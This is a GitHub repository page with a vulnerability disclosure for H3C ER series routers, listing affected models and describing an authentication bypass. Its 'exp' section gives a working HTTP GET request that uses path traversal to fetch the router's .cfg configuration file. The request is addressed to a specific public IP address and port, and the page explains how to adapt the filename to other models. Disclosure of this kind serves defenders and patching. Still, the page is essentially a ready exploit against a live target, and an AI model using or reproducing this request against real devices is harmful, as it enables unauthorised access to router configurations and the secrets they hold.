Skip to content
/ H3C-ER Public

Unauthorized vulnerabilities exist in H3C-ER system management

3 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

CJCniubi666/H3C-ER

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
README.md
README.md
 
 

Repository files navigation

H3C ER series router system management has unauthorized access vulnerability

Product: ER series router

version: ER3260G2,ER5200G2,ER3200G2,ER2100n,ER6300G2,ER5100G2,ER2200G2

rating: high-risk

website: http://www.h3c.com/

Hazards: Attackers can exploit this vulnerability to obtain sensitive information from routers by constructing special request packets to bypass identity verification.

principle: The router did not authenticate directory access and related files

exp:

Note:The ER5200G2 in the url needs to be changed to the corresponding model

GET /userLogin.asp/../actionpolicy_status/../ER5200G2.cfg HTTP/1.1
Host: 58.221.11.74:12345
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Sphere of influence:H3C Router Management ER Partial series

The address of the vulnerability:

ER Screenshots of the rest of the series:

ER5200G2:image

image

image

img

About

Unauthorized vulnerabilities exist in H3C-ER system management

Resources

Readme
Activity

Stars

3 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published